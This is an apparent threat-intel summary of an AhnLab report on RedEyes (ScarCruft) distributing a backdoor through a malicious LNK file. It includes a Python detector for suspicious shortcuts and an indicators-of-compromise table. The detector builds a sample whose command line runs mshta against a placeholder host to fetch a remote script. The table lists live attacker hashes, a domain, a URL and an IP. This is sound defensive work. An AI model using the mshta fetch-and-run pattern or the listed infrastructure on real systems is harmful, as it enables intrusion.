Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft)

2023-09-06 Ahnlab

https://asec.ahnlab.com/en/56756/


This malware uses the mshta process to execute additional scripts hosted at a specific URL. The command performs functions similar to those previously disclosed in Table 1 of the post <RedEyes Group Wiretapping Individuals (APT37)> [3]. The threat actor has been distributing the confirmed LNK file through a legitimate website, uploading it alongside other malware inside a compressed file named 'REPORT.ZIP'. As with the malware identified in <RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)> [2], the LNK file contains both normal Excel document data and malicious script code.
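An added defender-side check for the traits described above (example code, not from AhnLab or the post): it walks the public MS-SHLLINK layout to recover the shortcut's command line and measure how many bytes follow the last link structure, then flags an mshta launch, a remote URL and a large appended tail, which is where an embedded document and script would sit. The sample file, its placeholder host and the 1024-byte threshold are constructed for the example.

```python
import struct

# MS-SHLLINK (public format): 76-byte header, LinkFlags at offset 20, then optional
# LinkTargetIDList, LinkInfo, StringData fields and size-prefixed ExtraData blocks
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 1 << 0, 1 << 1, 1 << 7
STRING_FIELDS = ((1 << 2, "name"), (1 << 3, "relative_path"), (1 << 4, "working_dir"),
                 (1 << 5, "arguments"), (1 << 6, "icon_location"))

def parse_lnk(data):
    """Return (StringData dict, number of bytes left after the last link structure)."""
    if data[:4] != b"L\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Windows shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize covers the whole block
        off += struct.unpack_from("<I", data, off)[0]
    strings, width = {}, (2 if flags & IS_UNICODE else 1)
    for bit, key in STRING_FIELDS:           # CountCharacters + chars, no terminator
        if flags & bit:
            n = struct.unpack_from("<H", data, off)[0]
            off += 2
            strings[key] = data[off:off + n * width].decode(
                "utf-16-le" if width == 2 else "cp1252", "replace")
            off += n * width
    while off + 4 <= len(data):              # ExtraData ends with a block size < 4
        size = struct.unpack_from("<I", data, off)[0]
        if size < 4:
            off += 4
            break
        if off + size > len(data):           # size runs past EOF: count the rest as tail
            break
        off += size
    return strings, len(data) - off

def assess_lnk(data, min_trailing=1024):
    """Flag the traits in the post: mshta plus a URL on the command line, appended data."""
    strings, trailing = parse_lnk(data)
    cmd = " ".join(strings.get(k, "") for k in ("relative_path", "arguments")).lower()
    checks = (("mshta" in cmd, "command line launches mshta"),
              ("http://" in cmd or "https://" in cmd, "command line references a remote URL"),
              (trailing >= min_trailing, f"{trailing} bytes appended after the link structures"))
    return [msg for hit, msg in checks if hit]

def build_sample(arguments, appended):
    # constructed file: header with HasArguments|IsUnicode, one string, terminal block, tail
    header = b"L\x00\x00\x00" + LNK_CLSID + struct.pack("<I", (1 << 5) | IS_UNICODE) + bytes(52)
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le") \
        + struct.pack("<I", 0) + appended

# constructed sample: placeholder host; 4 KiB of zeros stand in for embedded document/script data
SAMPLE_LNK = build_sample("/c mshta http://PLACEHOLDER.invalid/script.hta", bytes(4096))
```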

Indicators of Compromise

Type    Value                               First Seen  Last Seen
HASH    27f74072d6268b5d96d73107c560d852    2023-09-01  2023-09-06
HASH    0eb8db3cbde470407f942fd63afe42b8    2023-08-22  2023-09-06
HASH    2d444b6f72c8327d1d155faa2cca7fd7    2023-08-22  2023-09-06
URL     http://bian0151.cafe24.com/admi…    2023-08-22  2023-09-06
DOMAIN  bian0151.cafe24.com                 2023-08-22  2023-09-06
IPv4    75.119.136.207                      2023-07-11  2023-09-06
